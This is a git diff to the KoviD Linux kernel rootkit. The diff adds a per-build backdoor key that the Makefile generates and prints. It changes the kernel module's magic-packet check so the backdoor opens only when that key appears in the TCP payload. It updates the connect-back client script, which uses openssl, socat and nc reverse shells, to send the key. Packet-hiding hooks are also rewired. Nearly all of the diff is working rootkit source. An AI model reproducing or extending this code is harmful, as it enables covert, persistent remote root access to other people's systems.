diff --git a/Makefile b/Makefile index e329316..e1f4ab7 100644 --- a/Makefile +++ b/Makefile @@ -11,6 +11,7 @@ AS=$(shell which as) CTAGS=$(shell which ctags)) JOURNALCTL := $(shell which journalctl) UUIDGEN := $(shell uuidgen) +BDKEY := $(shell echo "0x$$(od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')") # TODO: Check if we can generate a random PROCNAME, something like: # PROCNAME ?= $(shell uuidgen | cut -c1-8) @@ -44,7 +45,10 @@ obj-m := ${OBJNAME}.o CC=gcc all: persist + sed -i 's/^#define BDKEY .*/#define BDKEY $(BDKEY)/' src/bdkey.h make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules + @echo -n "Backdoor KEY: " + @echo $(BDKEY) | sed 's/^0x//' persist: sed -i "s|.lm.sh|${UUIDGEN}.sh|g" $(persist).S diff --git a/scripts/bdclient.sh b/scripts/bdclient.sh index b135ec0..637fd2c 100755 --- a/scripts/bdclient.sh +++ b/scripts/bdclient.sh @@ -62,16 +62,16 @@ usage="Use: [V=1] ./${0##*/} Local port for connect-back session - must be unfiltered Example: - ./${0##*/} openssl 192.168.1.10 9999 + ./${0##*/} openssl 192.168.1.10 9999 Verbose, example: - V=1 ./${0##*/} openssl 192.168.1.10 9999 + V=1 ./${0##*/} openssl 192.168.1.10 9999 Connect to GIFT address instead of this machine: - GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.10 443 + GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.10 443 If used alongside with GIFT, DRY(run) will NOT send KoviD instruction and will show client's command: - DRY=true GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.44 444" + DRY=true GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.44 444 " errexit() { @@ -91,7 +91,7 @@ check_util() { done } >&2 -if [[ "$#" -ne 3 ]]; then +if [[ "$#" -ne 4 ]]; then errexit "Missing parameter" true 1 fi @@ -130,7 +130,7 @@ case $1 in [[ ! -n "$V" ]] && exec &>/dev/null # shellcheck disable=SC2086 "$NPING" "$1" $GIFT --tcp -p "$RR_OPENSSL" --flags Ack,rSt,pSh \ - --source-port "$2" -c 1 + --source-port "$2" --data="$3" -c 1 } [[ "$DRY" == false ]] && f "$@" & pushd "$PERMDIR" >/dev/null && { @@ -147,7 +147,7 @@ case $1 in [[ ! -n "$V" ]] && exec &>/dev/null # shellcheck disable=SC2086 "$NPING" "$1" $GIFT --tcp -p "$RR_SOCAT" --flags Fin,Urg,aCK \ - --source-port "$2" -c 1 + --source-port "$2" --data="$3" -c 1 } [[ "$DRY" == false ]] && f "$@" & pushd "$PERMDIR" >/dev/null && { @@ -163,7 +163,7 @@ case $1 in [[ ! -n "$V" ]] && exec &>/dev/null # shellcheck disable=SC2086 "$NPING" "$1" $GIFT --tcp -p "$RR_NC" --flags Ack,rSt,pSh \ - --source-port "$2" -c 1 + --source-port "$2" --data="$3" -c 1 } [[ "$DRY" == false ]] && f "$@" & listen "$NC" -lvp "$2" @@ -177,7 +177,7 @@ case $1 in [[ ! -n "$V" ]] && exec &>/dev/null # shellcheck disable=SC2086 "$NPING" "$1" $GIFT --tcp -p "$RR_SOCAT_TTY" --flags Cwr,Urg,fiN,rsT \ - --source-port "$2" -c 1 + --source-port "$2" --data="$3" -c 1 } [[ "$DRY" == false ]] && f "$@" & pushd "$PERMDIR" >/dev/null && { diff --git a/src/bdkey.h b/src/bdkey.h new file mode 100644 index 0000000..e53e2c0 --- /dev/null +++ b/src/bdkey.h @@ -0,0 +1,11 @@ +/** + * BDKEY generated by Makefile + * DO NOT EDIT + * + */ +#ifndef __BDKEY_H +#define __BDKEY_H + +#define BDKEY 0x0000000000000000 + +#endif diff --git a/src/lkm.h b/src/lkm.h index 4e2f038..f2993b6 100644 --- a/src/lkm.h +++ b/src/lkm.h @@ -122,7 +122,7 @@ bool kv_sock_start_fw_bypass(void); void kv_sock_stop_sniff(struct task_struct *tsk); void kv_sock_stop_fw_bypass(void); bool kv_bd_search_iph_source(__be32 saddr); -bool kv_check_cursing(struct tcphdr *); +bool kv_check_bdkey(struct tcphdr *, struct sk_buff *); void kv_bd_cleanup_item(__be32 *); /** proc handling */ diff --git a/src/sock.c b/src/sock.c index 4328b00..d83a473 100644 --- a/src/sock.c +++ b/src/sock.c @@ -20,6 +20,7 @@ #include "fs.h" #include "lkm.h" #include "log.h" +#include "bdkey.h" static LIST_HEAD(iph_node); struct iph_node_t { @@ -425,21 +426,32 @@ static int _bd_watchdog(void *t) #endif } -/** - * if TCP flags are: - * FUCK, CUNT or ASS then you know... - */ -bool kv_check_cursing(struct tcphdr *t) { - uint8_t fuckoff = 0; +bool kv_check_bdkey(struct tcphdr *t, struct sk_buff *skb) { + uint8_t silly_word = 0; enum { FUCK=0x8c, CUNT=0xa5, ASS=0x38 }; - fuckoff = t->fin << 7| t->syn << 6| t->rst << 5| t->psh << 4| + silly_word = t->fin << 7| t->syn << 6| t->rst << 5| t->psh << 4| t->ack << 3| t->urg << 2| t->ece <<1| t->cwr; - //sudo nping --tcp -p --flags --source-port -c 1 - if (fuckoff == FUCK || fuckoff == CUNT || fuckoff == ASS) - return true; - + if (silly_word == FUCK || silly_word == CUNT || silly_word == ASS) + { + uint64_t address_value = 0; + unsigned long a = BDKEY; + unsigned char *data = skb->data + 40; + + if (skb->len >= sizeof(struct tcphdr) + sizeof(struct iphdr) + 8) { + address_value = ((unsigned long)data[0] << 56) | + ((unsigned long)data[1] << 48) | + ((unsigned long)data[2] << 40) | + ((unsigned long)data[3] << 32) | + ((unsigned long)data[4] << 24) | + ((unsigned long)data[5] << 16) | + ((unsigned long)data[6] << 8) | + (unsigned long)data[7]; + if (address_value == BDKEY) + return true; + } + } return false; } @@ -460,7 +472,7 @@ static unsigned int _sock_hook_nf_cb(void *priv, struct sk_buff *skb, int dst = _check_bdports(htons(tcph->dest)); /** Silence libpcap on CUNT/ASS/FUCK */ - if (dst == RR_NULL || !kv_check_cursing(tcph)) break; + if (dst == RR_NULL || !kv_check_bdkey(tcph, skb)) break; kf = kzalloc(sizeof(struct kfifo_priv), GFP_KERNEL); if (!kf) { diff --git a/src/sys.c b/src/sys.c index 3c1e808..7e93696 100644 --- a/src/sys.c +++ b/src/sys.c @@ -659,7 +659,7 @@ static int m_packet_rcv(struct sk_buff *skb, struct net_device *dev, return 0; else { struct tcphdr *tcp = (struct tcphdr*)skb_transport_header(skb); - if (kv_check_cursing(tcp)) + if (kv_check_bdkey(tcp,skb)) return 0; } } @@ -680,7 +680,7 @@ static int m_tpacket_rcv(struct sk_buff *skb, struct net_device *dev, return 0; else { struct tcphdr *tcp = (struct tcphdr*)skb_transport_header(skb); - if (kv_check_cursing(tcp)) + if (kv_check_bdkey(tcp,skb)) return 0; } }